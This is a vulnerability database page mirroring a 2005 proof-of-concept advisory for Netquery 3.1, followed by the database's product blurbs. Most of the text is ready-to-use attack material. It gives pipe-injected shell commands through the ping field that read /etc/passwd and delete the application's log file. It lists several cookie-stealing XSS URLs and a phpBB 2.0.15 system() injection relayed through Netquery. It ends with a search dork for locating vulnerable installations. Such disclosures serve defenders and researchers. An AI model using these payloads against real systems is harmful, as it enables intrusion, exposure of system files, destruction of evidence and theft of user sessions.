Lucene search
K

netquery31.txt

🗓️ 22 Jul 2005 00:00:00Reported by rgodType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Remote command execution and XSS vulnerabilities in Netquery 3.1 allow information disclosure.

Code
`Netquery 3.1 remote commands execution, cross site scripting, information disclosure poc exploit  
  
software:  
author site: http://www.virtech.org/tools/  
  
a user can execute commands on target system by PING panel, if enabled like often happens, using pipe char on   
"Ping IP Address or Host Name" input text box, example:  
  
| cat /etc/passwd  
  
then you will see plain text password file   
  
| pwd   
  
to see current path  
  
| rm [pwd_output]/logs/nq_log.txt  
  
to delete log file...  
  
disclosure of user activity:  
if enabled, a user can view clear text log file through url:  
  
http://[target]/[path]/logs/nq_log.txt  
  
xss:  
http://[target]/[path]/submit.php?portnum="/><script>alert(document.cookie)</script>  
http://[target]/[path]/nqgeoip2.php?step=<script>alert(document.cookie)</script>  
http://[target]/[path]/nqgeoip2.php?body=<script>alert(document.cookie)</script>  
http://[target]/[path]/nqgeoip.php?step=<script>alert(document.cookie)</script>  
http://[target]/[path]/nqports.php?step=<script>alert(document.cookie)</script>  
http://[target]/[path]/nqports2.php?step=<script>alert(document.cookie)</script>  
http://[target]/[path]/nqports2.php?body=<script>alert(document.cookie)</script>  
http://[target]/[path]/portlist.php?portnum=<script>alert(document.cookie)</script>  
  
  
a user can use on-line Netquery installations like proxy servers  
to launch exploit from HTTP GET request panel, example:  
exploiting Phpbb 2.0.15:  
make a get request of  
http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&highlight='.system($HTTP_GET_VARS[command]).'&command=cat%20/etc/passwd  
  
googledork: inurl:nquser.php  
  
  
rgod  
email: rgod[at]autistici.org  
site: http://rgod.altervista.org`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation